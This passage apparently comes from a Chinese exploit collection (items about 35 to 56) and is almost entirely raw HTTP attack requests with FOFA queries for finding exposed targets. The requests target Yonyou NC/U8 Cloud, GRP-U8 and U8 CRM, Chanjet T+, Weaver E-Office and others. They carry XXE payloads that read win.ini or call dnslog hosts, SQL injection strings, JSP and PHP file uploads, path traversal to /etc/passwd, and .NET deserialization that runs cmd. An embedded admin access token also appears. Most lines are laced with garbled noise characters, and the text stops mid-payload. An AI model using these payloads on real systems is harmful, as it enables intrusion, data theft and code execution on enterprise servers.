, J5 H' x- S$ ^5 f: wAccept-Encoding: gzip, deflate
* O4 l! b; O1 P) J, _0 kAccept: */*
# g9 D% t2 r6 b+ N6 A5 LConnection: close
$ m e; B! ?$ F# O" w5 d9 w6 Y% `accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA( K* ~: I$ [, V0 t3 z
Content-Length: 190
( _( f/ h6 \8 Q' R2 Q# \( iContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
, u: R/ o, ~' a, \+ \$ Q h% M6 D: D- ~6 G' K) z8 Y# E
--fd28cb44e829ed1c197ec3bc71748df0
( \0 u& O5 C5 h/ h7 n' gContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"* h' h/ E( a( t, r2 \! I8 I
. }; y2 y" R, e3 Z; r# Z
<%out.println(1111*1111);%>% r/ F. J1 A! @3 P* d
--fd28cb44e829ed1c197ec3bc71748df0--
3 A/ n7 z) m& l/ H1 ]7 c$ {4 Z! M$ M, t$ Z$ i# j
0 f7 E/ t6 O6 {/ \& H9 @+ h8 `% c36. 用友NC-Cloud soapFormat XXE
" K3 _3 A; l: h1 b) F4 ~' \FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"& m6 R2 O3 I+ R7 m: W8 o2 K
POST /uapws/soapFormat.ajax HTTP/1.1
4 B7 @( }- p1 k0 QHost: 192.168.40.130:8989
- h4 J) w8 U2 p, k P) _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
, a5 B& N. r* j- LContent-Length: 263
1 z2 E6 v/ [$ j6 F0 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ G9 w/ F$ Q9 F/ u% p& B& BAccept-Encoding: gzip, deflate
7 b- D2 k, |, U1 n# [: {* Y/ B2 GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 j" W$ n5 d1 _: ^8 E# e& {' kConnection: close
" Y& w# w0 g% A/ A8 x8 q9 J' xContent-Type: application/x-www-form-urlencoded
4 {$ H3 r c3 m& Y) Z7 `+ MUpgrade-Insecure-Requests: 1* @/ V. l: G6 E: C* E; D5 Y
+ f4 K& C a, ymsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
8 S- ]$ s0 Q/ _! | Z* l7 ?: S1 O- G( s: l& i
* i9 y" K: I0 Z. L+ \$ P37. 用友NC-Cloud IUpdateService XXE# E, G) Y3 @0 }0 k' Q) X
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
: O/ z3 I2 y# |; PPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1* C! c3 Q5 Q4 d# g- E1 @
Host: 192.168.40.130:8989
" F+ w; A# q- zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
& n9 f: h& H* Z7 EContent-Length: 4215 F: x; u. q' x+ i q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9% x) g9 i; Y2 u5 n" m5 X5 h8 M+ a5 [* A
Accept-Encoding: gzip, deflate# t! J7 Q( D- c) W
Accept-Language: zh-CN,zh;q=0.9
% a) D$ w3 C9 {8 M- BConnection: close
5 F& ?1 `' t4 k+ q; v4 {$ }* Q5 lContent-Type: text/xml;charset=UTF-8
. k7 P* F- X: q$ H. c7 oSOAPAction: urn:getResult% W9 G2 q: J) b
Upgrade-Insecure-Requests: 17 a9 v8 ] c6 a. i* M- a
$ i- Q) v0 A* z
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
& F) \' i& u+ s: H. r# J2 Z<soapenv:Header/>
, m/ v: i$ Z: ]9 R<soapenv:Body> r# k7 i, K* p% c$ p6 i6 d( C
<iup:getResult>: J% B- O% S$ ?" a
<!--type: string-->
) m0 E3 x; K1 n- \" x5 i<iup:string><![CDATA[
1 b" s. Q3 k" |6 O8 t<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>1 J: Y: a# ~: D+ v% t/ X
<xxx/>]]></iup:string>
0 x, ?* E2 K+ b5 e' p0 l</iup:getResult> m9 x4 f( H6 [8 ]( P: [1 m
</soapenv:Body>% ?$ d1 Q- C( a, L0 S
</soapenv:Envelope>. z; b6 x/ q9 _* h) E& r1 f
0 v0 o8 t+ m8 g& X- E
! m) h6 k: t" ]
0 I! S7 A2 X" f7 M. q' {38. 用友U8 Cloud smartweb2.RPC.d XXE, j& ]! I+ B( r+ ?3 _! G$ l
FOFA:app="用友-U8-Cloud"( B1 M; m: j6 I3 m! r; \
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1+ L: I* q$ X# y
Host: 192.168.40.131:80880 m+ X i% q' W- ]. U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25* r- p, J& h* X! ?. V- n* K
Content-Length: 260
3 \! Y7 ?/ y/ N/ tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3! Q1 R( q9 |; r2 K' i3 P
Accept-Encoding: gzip, deflate
. g2 o+ ], O" R- `$ L6 F5 J# AAccept-Language: zh-CN,zh;q=0.9$ i- w6 L7 w* m# `
Connection: close$ l# Q# c) M% M) z
Content-Type: application/x-www-form-urlencoded
( f0 J: G' _" L( r/ F
E. j; Q' ]/ q0 w) h- c) ^5 f__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>: }" n2 ^5 \( |7 @9 i4 `
) u& ]8 a* v0 g# w( r
: \5 h' Y5 o. C$ F. S) R39. 用友U8 Cloud RegisterServlet SQL注入
6 d) t" y8 j4 }% s gFOFA:title="u8c": l9 _! _6 Z! ?& r* _* r
POST /servlet/RegisterServlet HTTP/1.17 ?5 x' S4 m/ S/ m/ ~
Host: 192.168.86.128:80898 H' g/ b/ Q& G, J$ a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
6 V3 @, J. }) h3 `' @$ H6 h p2 uConnection: close
. M! }3 |" Y8 b0 p0 I8 \Content-Length: 85' Z" B$ s- Y' m" q0 \
Accept: */*- |* F3 o% |6 X j' W
Accept-Language: en
' L4 b1 i. E7 _Content-Type: application/x-www-form-urlencoded! O4 ~& R; W( S0 t7 ]. V
X-Forwarded-For: 127.0.0.1$ k m: T; N E
Accept-Encoding: gzip. q! [* H8 p* D0 f8 b0 `; u' J: g
' _, D/ N# |7 ~7 `# Susercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
' w5 X; h& d4 O+ l
: f; ?, M `' P0 z% d2 V' n4 m' r1 |9 i+ z& o5 e( {" a
40. 用友U8-Cloud XChangeServlet XXE
% \" O0 f+ {1 M4 }' b! p7 i# g: `FOFA:app="用友-U8-Cloud") A& T- C( r7 D2 G& ]/ P; e" Z6 T7 \
POST /service/XChangeServlet HTTP/1.1
# ]* o- r2 @, o7 z* P- m/ s2 BHost: x.x.x.x7 }) m+ H s( |; x- f9 w
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36) J* u" k8 P2 E a3 K/ l# t
Content-Type: text/xml0 Q3 s! z, h, [
Connection: close
! y U; C7 {5 |2 j2 E' l# A) n8 [& |% w0 \# n
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>: m9 r0 |- |$ C9 A
( l, X% H1 ^5 Y$ _4 i
7 c% l- ^2 @/ {- k# \, V
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
% h8 }. j @" }2 I7 F, f& Q8 I" sFOFA:app="用友-U8-Cloud"
8 g4 A6 ?( @; kGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1: p$ T1 b1 X4 c4 c2 O
Host:. B# \$ v" m( ^+ `! N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 _! V; H) r [7 g/ e+ j' n- DContent-Type: application/json# M# i0 Y; S) X7 }) w
Accept-Encoding: gzip+ w" e# z7 h; n9 i
Connection: close2 V- K- A" W: Q, v. E% c5 F3 [
' E" U W, N3 [3 V+ t' s8 |; Z0 G' t+ Z, N. w8 A7 B/ e0 \2 s
42. 用友GRP-U8 SmartUpload01 文件上传
* p/ E' g" X6 v' f+ FFOFA:app="用友-GRP-U8"
' ]2 [ F/ M7 X$ v5 s; w& M2 UPOST /u8qx/SmartUpload01.jsp HTTP/1.1( x" j+ M+ l& j
Host: x.x.x.x9 v5 _! {* B1 q! _0 K
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt- x5 q" E& r0 f! P( B# V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.361 Y* H% o- a/ k; z+ U: g% k
9 {: V% b, q/ S( T' N1 ePAYLOAD( u C8 D6 Z2 B1 P' B
5 q: _7 d* U$ \3 y
( w- a# B, o# x/ {& j( @. F" F
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml- X/ G1 @/ e Z. W" V/ @7 }
: N: E$ S4 f# o b. B0 D2 B
43. 用友GRP-U8 userInfoWeb SQL注入致RCE( z: _, m2 U5 e- w0 ^9 q$ f
FOFA:app="用友-GRP-U8"
6 r. }% J, W' P; u: K# Q& iPOST /services/userInfoWeb HTTP/1.1
# v l! q) @$ }8 [0 xHost: your-ip. O S) U" h2 p+ z* J z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36% X9 k6 }+ Z& m6 q1 @) v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- r) M$ M' H" z/ K$ J9 |3 g
Accept-Encoding: gzip, deflate' M; _: b1 [/ V. ^: n0 d& U+ j; o
Accept-Language: zh-CN,zh;q=0.9
/ M2 P2 S4 {# _$ @/ y3 zConnection: close+ S9 h" e6 Z9 i1 t. y2 y
SOAPAction:
J" _" w5 x3 x3 Q6 K+ J' Z! Y2 NContent-Type: text/xml;charset=UTF-8: v$ c6 r; l* W& F
3 M7 K# e0 d& z
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
: @% H; }2 `& l8 {$ K' ?$ c <soapenv:Header/>
, R+ v N' g D8 W% B; E <soapenv:Body>/ z: g. k4 X2 ]6 b% f% m
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
$ \5 m G& v5 E+ F <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>! O# S9 d D$ M: I. q
</ser:getUserNameById>6 S& b8 [. t% h+ y @; ~5 o8 b* A
</soapenv:Body>% w, u3 q% F& L9 R p5 e
</soapenv:Envelope>
6 Y0 l& o3 x% V4 g: _
* f' |1 z$ q4 M; \, p- U. q' Y0 [
0 X- N$ n& I$ j. h7 ^44. 用友GRP-U8 bx_dj_check.jsp SQL注入2 `* [ i# J& n4 ^' O$ P! c
FOFA:app="用友-GRP-U8"
! s2 {# m: D' x. K$ S T2 J. MGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
- B6 U& m% E$ m0 [Host: your-ip5 G. Q) A6 k8 S8 H2 _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.365 n- R3 s* p2 {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! B9 R) v T) N& z$ \Accept-Encoding: gzip, deflate
( o( A( ~5 Z- e' E) u" P0 EAccept-Language: zh-CN,zh;q=0.92 g% ?. g# v: D- X S8 _: i" o- b
Connection: close" T+ G2 o* P- K1 X& B: e& k
2 q, V, l7 J! F4 m9 @# T
7 W, B0 f" p f' h! c9 _( c6 T! O45. 用友GRP-U8 ufgovbank XXE6 M: z2 K% s/ C- |. Y% J: }
FOFA:app="用友-GRP-U8"# G. P5 w6 ?2 Y( }9 C4 o; C0 X: K
POST /ufgovbank HTTP/1.1
4 S! g7 [% A# x3 H5 HHost: 192.168.40.130:222
8 M) O) I; j/ w4 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
" r7 u; A* r% b. c0 |, VConnection: close
% S5 j: A' X$ s0 n0 zContent-Length: 1619 Z- W- A( N2 T/ K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% W9 [" c% F1 W& P7 y) c# V' lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 n. P6 P2 H- A" C, UContent-Type: application/x-www-form-urlencoded4 J. e6 l, O$ J3 ? e
Accept-Encoding: gzip
& y- a' H% K& r0 ~1 ~; p
& {! i8 a6 [+ q) {' ureqData=<?xml version="1.0"?>* C* b8 G( |/ |; F
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
5 H! y: Y4 F( ]4 h' Q6 T0 C
/ Z1 r6 a1 L% ]; @; v& r3 ^. ~ c# x2 ]0 [. p- q
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
' ]- Z; e& Y. \7 FFOFA:app="用友-GRP-U8"0 D% n4 r6 Q6 J+ X/ a/ E
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1& z v* b$ f: p6 f! P
Host: your-ip- X. z9 I2 ]3 {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36% q2 Y- z* D7 h- {/ P3 k, I$ [$ D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" o! C# e9 Q0 PAccept-Encoding: gzip, deflate
7 I% _7 \+ x" V3 N8 Y/ v4 A+ w- N: h1 CAccept-Language: zh-CN,zh;q=0.9+ t+ [& s0 i" w5 Z1 C# J6 N
Connection: close
" L! c! g. M: n7 `& T8 @ C* l# j
6 q# F6 T1 L' P" G3 ]: H
. Y4 V4 o- @5 J$ E47. 用友GRP A++Cloud 政府财务云 任意文件读取
" e+ b4 q9 l z GFOFA:body="/pf/portal/login/css/fonts/style.css"
4 R ?/ D3 ~, ~" ~0 R1 l) VGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
$ [ Y* Z x5 X/ pHost: x.x.x.x8 K8 C+ n4 b" I$ K
Cache-Control: max-age=01 B$ Q: V' z5 b" p
Upgrade-Insecure-Requests: 1' q' t' | L- M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.369 [* B6 R5 q2 b7 R" k* e# A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) A$ N7 V6 j) `% t6 L4 \Accept-Encoding: gzip, deflate, br
; P. R: u3 s# d$ y- a7 lAccept-Language: zh-CN,zh;q=0.9
/ k2 [( d9 m& N" dIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
5 j, q* X( N1 w, m6 BConnection: close
% b" b- ?, B) l# }' L
% g$ G# p O0 ~5 ?8 X: l8 n* {+ T' G4 ]
8 S) T, p, O2 z3 p1 _+ W9 i48. 用友U8 CRM swfupload 任意文件上传
) H. V# ]3 T; I* l# uFOFA:title="用友U8CRM"
" `5 u/ ?1 D* h* p+ L/ w& nPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.17 e* X& s# i1 Z0 w' I2 |7 r/ G
Host: your-ip
$ I d+ f' t# _! k% _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
& O/ I! X% I$ N$ o4 yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 C& v( i8 ]. h' N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 o, q5 n! A& S9 v
Accept-Encoding: gzip, deflate {' [+ A! l3 W
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
+ T% Y- T0 E0 W------2695209672394068716424300668558 D1 k6 S( A* F, C. u3 U6 s
Content-Disposition: form-data; name="file"; filename="s.php"
& g( V6 ]% n$ v12319 q& q$ S! d. [5 [
Content-Type: application/octet-stream# P/ n e" G: n( A% q2 D4 q
------2695209672394068716424300668558 ]. r9 O# c, _0 q- r
Content-Disposition: form-data; name="upload"
) E' ?( K) _ v6 h# x2 u* l/ Wupload/ J* c" T) K7 Y9 B& e+ ~5 r* W
------269520967239406871642430066855--
, t$ _& |( D% _) v* p, g- J. {9 t2 A @
8 {' W. x* C7 V2 L+ B6 c
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
. s. w v* ]9 A( Y5 e, RFOFA:body="用友U8CRM"
' t% @- B/ |& [% y& s
Q6 j# U) [4 p$ X# u# x/ e0 }. EPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
% n- u$ A2 f }9 d+ RHost: x.x.x.x4 E4 }. v: M3 ~2 D8 T$ S) X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
" m, i; J( F( I. `5 ~) WContent-Length: 329
a ]9 C1 ^% x) `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 B0 M+ v. k: q3 T r, Z; M+ yAccept-Encoding: gzip, deflate
. X, ~5 i/ B6 e, C7 D9 `/ O' SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ D [& `- W. B" Q9 R/ e! p4 dConnection: close! }$ T2 N# W7 r
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w g6 O' k# m' G5 Y, I' f
6 U/ p# e, P. T4 K2 n e6 p
-----------------------------vvv3wdayqv3yppdxvn3w3 V: Z1 [, h0 m. z0 i
Content-Disposition: form-data; name="file"; filename="%s.php "
3 B4 x6 U( ^9 ]; O$ |! ?& EContent-Type: application/octet-stream
" o! {% B8 V" E7 q9 D1 {# K# z, s* A) v, _4 f
wersqqmlumloqa- ]6 `0 l O- r- T& Z t% e
-----------------------------vvv3wdayqv3yppdxvn3w( j$ {) y+ \" \
Content-Disposition: form-data; name="upload"
M) N5 H' F8 ]3 I) m* W& A9 l4 J" e( e) F2 T# F
upload
% S! }; `4 o& |8 x" P-----------------------------vvv3wdayqv3yppdxvn3w--
, Q! C! Y H. ?1 X, w! k! V4 j" }* q; m1 C
7 ~ g1 v# a. G; y
http://x.x.x.x/tmpfile/updB3CB.tmp.php
: o; ~1 C- f, u& e
, ~# O8 q7 ?& ~50. QDocs Smart School 6.4.1 filterRecords SQL注入
# E+ _) i/ L, ^5 pFOFA:body="close closebtnmodal"& \2 b* h) _( w' l7 S
POST /course/filterRecords/ HTTP/1.19 G* a3 b$ T% }5 N; p$ P5 D
Host: x.x.x.x
; y. F2 A+ |6 \+ ] W4 ^% W$ N& ?9 N5 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.369 `5 b& Y2 ~ O$ y7 `! i
Connection: close
' e! I a$ @; ? W8 h. x" j2 C* ~Content-Length: 224
: K/ k- T/ I$ O# C3 p0 hAccept: */*! h4 r; a( |3 Z" N; F P
Accept-Language: en# {; P& t- l! n3 o$ [
Content-Type: application/x-www-form-urlencoded' T, k m* c( Q0 ]9 J8 A5 r
Accept-Encoding: gzip) C# @7 }% n8 l- {
% N$ P* z* L( Q! C
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
k$ H! t4 S. ~1 }7 X: q3 Y" k/ u0 I- i' g
) v* p/ X9 O( R51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入 k; S4 T( M- X9 c! j
FOFA:app="云时空社会化商业ERP系统"* l/ H9 P3 Q1 b v
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
" [: R9 i; S9 K. G" qHost: your-ip
1 D2 D$ u7 I3 d3 w, CUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36$ @, P; g$ b% U: L- D1 d% v, ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ T3 h0 ]3 G1 r" e8 @& L6 m" j! IAccept-Encoding: gzip, deflate
6 \: v) w4 q3 e) W8 xAccept-Language: zh-CN,zh;q=0.9. w2 m% X$ p8 { {' d0 _2 C
Connection: close9 ?: {# _3 `% _) w5 h$ l. A% g- B- J
* _5 V/ q9 }+ A- b1 X8 M) h+ l" r8 [% V, B% D
52. 泛微E-Office json_common.php sql注入
$ I9 p k7 p3 PFOFA:app="泛微-EOffice"
2 }% z8 a. P ?; `: vPOST /building/json_common.php HTTP/1.1: D% }6 U* }0 y6 Q, c+ ]
Host: 192.168.86.128:8097
7 I( z! W+ _2 m2 N3 N' z- o4 L pUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
$ k9 U8 s6 d$ K# ~ DConnection: close" o( W( ~. I$ P! D
Content-Length: 87: }3 F( t# B0 K: D: r5 k+ k
Accept: */*7 h! ?, a; @+ a0 U' ~
Accept-Language: en0 U* w" O, x, O9 i* e2 ]+ N" x
Content-Type: application/x-www-form-urlencoded5 J, }, A2 \( o- x0 a' O& M
Accept-Encoding: gzip
( E$ s6 c, F2 }$ P
# N6 t1 g1 h, M' f/ ^( ]* O! ctfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
$ y1 I8 e' G( ]7 [8 I
* v! I0 T8 p$ e) h" |( f% m4 J* U" q9 x
53. 迪普 DPTech VPN Service 任意文件上传8 D9 `9 h0 o' {( }0 t
FOFA:app="DPtech-SSLVPN"
* |3 d2 d4 t) i/ u3 q) _* I# W/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd9 @$ f1 w5 ~! a) d( ?4 v
2 Z* @3 k- |7 |4 [5 E
. I$ u$ N& y/ Y* N5 _
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
% d4 S$ h1 ]2 qFOFA:app="畅捷通-TPlus"
/ b( h7 p7 T* u/ `: A6 P t第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件1 p( P; U; g [. v8 }
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt": V- J% Q5 V' [6 C4 v- Z
6 T9 y! P" f, y4 y- I
- E" v( c' O' h( ]完整数据包
# s- y2 F6 q' F2 Q2 S6 ^( p1 }POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1: N6 J; }! n) I
Host: x.x.x.x
# {, o# X# J+ v. s) lUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
# `1 R$ u1 Y/ W7 I% l9 v8 cContent-Length: 593, c4 J* O2 k" _3 B( @. A. C
1 D- `- f. j3 p. z. J! z5 Q$ z- k
{6 \- q- c( y/ p3 X! A! y9 Q( g7 V
"storeID":{
8 o) s: P9 a$ q( Z "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
! G" L. f! t% R5 p3 j "MethodName":"Start",
1 V! q1 M+ w; | "ObjectInstance":{) \: ]% \8 @' w) t; B- K
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
0 M W7 s2 Y6 J/ w "StartInfo":{6 E, j/ q. }, B$ a/ S
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
9 `8 h6 w3 \% W1 x D7 L "FileName":"cmd",9 O3 C" {& G- ?3 ]: ], ?
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
1 O! f! C" N3 v- L7 V- w$ y$ W }0 Q9 n" C% K, q6 m. o2 T
}, O3 h" ~ I% ^/ l; Z
}, Z3 _' ? T4 a
}
" L; Z! q7 A; D* P0 E6 a1 F" u& f$ `! M6 a+ {5 b
3 Q( r7 {8 |- _$ j2 k' X- t
第二步,访问如下url
! t! U5 S* |6 B* T1 c. d/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt/ {$ c8 l4 R) u7 D! S; _7 _, ]9 ~
* |1 x1 m% V# b5 R9 J$ u& o
- L$ k# l) I. g4 }" ~( X
55. 畅捷通T+ getdecallusers信息泄露
: U2 ^8 K, {; k' z5 DFOFA:app="畅捷通-TPlus"
1 F( m% r; t1 }/ G4 N: p第一步,通过9 @4 ^$ K$ }7 l3 C
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie; z ^+ `$ l0 Q
第二步,利用获取到的Cookie请求% T* N4 s# j( F6 p
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
* y% j, V6 `& ^2 ~3 ^' f
; P/ a! A$ f) w: n: x9 @% @* u$ j56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE: f, v6 o# Q, f, [6 K
FOFA: app="畅捷通-TPlus"' X8 Z" U% N$ ?0 K/ K) S
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
- L) I& }7 z; THost: x.x.x.x9 j9 I0 l1 M* y$ O+ x0 J$ w1 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
/ J* f5 n7 W" K D$ ~3 OContent-Type: application/json7 Q. M* ~4 U5 @' W) z% T
$ |: c: T- k" ]+ G{+ C9 d4 D$ O6 G" L2 B+ r+ ?
"storeID":{
4 o4 y `$ i7 v E. ]3 m/ a6 r' s "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",4 `: m6 ?4 O0 P$ F( f
